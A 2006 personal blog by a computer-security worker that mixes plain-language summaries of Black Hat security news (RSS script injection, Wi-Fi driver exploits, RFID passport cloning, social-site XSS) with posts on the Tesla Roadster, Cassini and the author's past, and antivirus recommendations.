Wired reports that Blackberry handhelds can be used as a backdoor to allow an intruder complete access to any network which "trusts" that Blackberry device.



Users of Blackberry devices should be careful about what attachments they open in their email . . .

Friday, August 4, 2006

The car of my dreams!

Oh. My. Gawd.



I am in serious lust with a cage. (Those that know me may remember that I have never lusted after anything with more than 2 wheels prior to today.)



"The Tesla Roadster has a range of 250 miles, says the company.



The Tesla's lithium-ion batteries can be raised from the dead to a full charge in 3 ½ hours. . . . Tesla will have its own portable charging pack so it won't be range-tethered to its home charging station.



Perhaps most important . . . the Tesla offers fun, in large, hair-raising voltages. The company claims 0 to 60 mph acceleration in 4 seconds and a top speed of 130 mph."




I want one!




Engineers have known for a long time now that electric motors are capable of much higher levels of torque and power than any reciprocating engine ever invented. The problem is not the motors, its the batteries. If we ever develop a portable electrical source for vehicles, our world will change drastically.



Imagine a car with a high-power motor on each wheel. Heck, the wheel itself would be the rotor for the motor, the inside would be the stator. Done right, you would not need pressure brakes . . . it could all be done electronically, which means better braking and no worn out pads - ever again. It would be the ultimate power horse and all wheel drive.

Blog RSS feeds pose risk to subscribers

And yes! You guessed it, even more cheerful news springing forth from this weeks Black Hat Conference in Las Vegas.



Turns out that several software applications that collate the popular RSS and Atom formats can pass malicious JavaScript, in some cases bypassing the local systems security settings. This allows the script to run with unfettered access to your machine. Attackers can even inject their attack code into the comments of trusted blogs!



"Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."


( . . . snip . . . )



"A large percentage of the readers I tested had some kind of an issue," he said. In his presentation, Auger listed Bloglines, RSS Reader, RSS Owl, Feed Demon, and Sharp Reader as vulnerable. As protection, people could switch to a nonvulnerable reader. Also, feed publishers could ensure that their feeds don't include malicious JavaScript or any script at all, Auger said. Some services, however, rely on JavaScript to deliver ads in feeds, he noted. "

Do you have my stapler?

Some nights you just wander aimlessly until you find strangeness to sooth the tattered sleepless soul.



I don't know why those stupid links are so damn amusing. Are they really that funny, or am I just in "one of those funky states?"



But then . . . just as one gives up hope for one's sanity, one finds this gem on the same site.



(Warning, possible long load times for the above links.)

Thursday, August 3, 2006

It's not just Wi-Fi drivers being newly exploited . . .

Apparently hackers are going after other system drivers - although the Wi-Fi hack is still one of the more frightening applications.



Your sound, video, and network card drivers are among the next big targets. Not only that, other software agents that are frequently ignored, often unused, but generally running on a default system installation have become the focus of malware developers for the next generation of spyware, rootkits and viruses.



This is why I so often tell people to turn off unused services. Black Vipers site (mirror - his main site appears to be down) has excellent coverage of that topic.

RFID, US Passports and more paranoia

Even more Black Hat Conference goodness for you today.



Wired reports that RFID embedded passports can be cloned, compromised, snooped . . . and worst of all, used as triggers for roadside bombs intended for US passport carrying citizens.



It's enough to make me believe in tin foil hats -- for my passport!

Critical Wi-Fi driver flaws expose laptops to infection

You arrive at your favorite coffee shop, turn on your laptop and order your coffee.  You have not yet connected to the public Wi-Fi hotspot sponsored by the shop.

Suddenly the performance on your laptop drops inexplicably.  When you initialize the connection to the Internet, aggressive popups begin appearing almost immediately.  Or unnoticed by you, your files are being uploaded somewhere . .. and your keystrokes are being logged as you access your bank statement - even though you use a secure SSL or VPN connection over Wi-Fi.

You've just been infected by a rootkit with a nasty trojan virus piggybacked onto the payload.  And it happened right after you powered up but before you connected to the Internet.  How is this possible?

This scenario is about to come true.

A pair of hackers at the Black Hat conference in Las Vegas demonstrated just such an attack this week, highlighting newly discovered exploits in the drivers for popular Wi-Fi adapters.  While their demo was conducted on a Mac Powerbook, they say that any PC with vulnerable Wi-Fi drivers is exposed to this risk.   As of this writing, no fixes have been released by any of the major Wi-Fi device companies.  The exploit is not yet in the wild - but it's a matter of time.  Now that the possibility of this attack is known, we are sure to see it in real life very very soon.  

More information at Security  IT Hub.

I will be watching this closely.

Wednesday, August 2, 2006

"The Cassini spacecraft orbiting Saturn and headed for a series of close encounters with Titan, the planet's largest moon, also appears aimed for an extended stay at the ringed planet, the mission's chief says. "

When I was a kid, I really wanted to be an astronaut.  No, really.

On my 18th birthday, I applied to the Air Force with dreams of becoming a crack pilot, which at that time was the best way to get into the space program as a flying crash-test-dummy.  Imagine my disappointment when I was informed that a) I was too tall and b) color-blind people need not apply.  Would I like a nice position in the USAF as ground crew for runway maintenance?

So I turned to computers.  Was one of the first kids in my town to have unfettered access to PDP-11 workstations at the local university.  I wrote programs that used composition rules to churn out really sick sounding computer generated music.  Vector analysis algorithms to solve stress versus force problems for my physics class.  You get the idea.  Never did get around to obtaining a CS degree (which hurt me later in corporate life).  But experience does count, and while turning a great hobby in computers into a full time career in computer security ruined a good hobby, it's been a rewarding career. 

More later . . ..

The Nigerian"-style scam letter is reborn?

Disgusting. See for yourself. :(



Beware the 'soldier' offering you riches (Seattle PI)



There appear to be no limits in the depths to which online crooks will stoop.


Social networking sites have (gasp!) open XSS vulnerabilities


Researchers at a well known anti-malware company checked out a few popular social networking sites to see how vulnerable they were. In 30 minutes they discovered more than half a dozen server side "worm-able" Cross Site Scripting (XSS) vulnerabilities.



What can end users do?



1) Patch your operating systems! Windows users should be aware that Microsoft generally releases critical updates every second Tuesday of the month. Setting your automatic updates to check once per week (the longest period you can select in the UI) is a great idea. I recommend selecting Wednesday early in the morning - before your work day starts. Leave your machine on Tuesday night . . .



2) Subscribe to good anti-virus protection



3) Subscribe to Malware/Spyware/Adware protection




AntiVirus products that tested well in recent reviews:

- eTrust 8.1 Corporate (Not the home or personal version.)

- Kaspersky

- NOD32

- F-Secure



Some not so good choices:

Symantec AV (over 30% tested infection rate with current signatures)

McAfee AV (over 33% infection rates, plus exploitable holes in their update service.)



While both of the above share the most market share - they offer abysmal protection. They are also system resource pigs. I tell friends that ask me which engine to choose that these two products will turn a perfectly good Pentium IV machine into a PII . . .



Malware Real Time Protection - Best products in order of effectiveness

- Sunbelt Software's CounterSpy (cousin of Windows AntiSpyware Beta 1 and distant relative of Microsoft Defender Beta - but much better!)

- Spysweeper



Malware scanners

Spybot Search & Destroy

Adaware Personal



(Links from this article will open a new browser window.)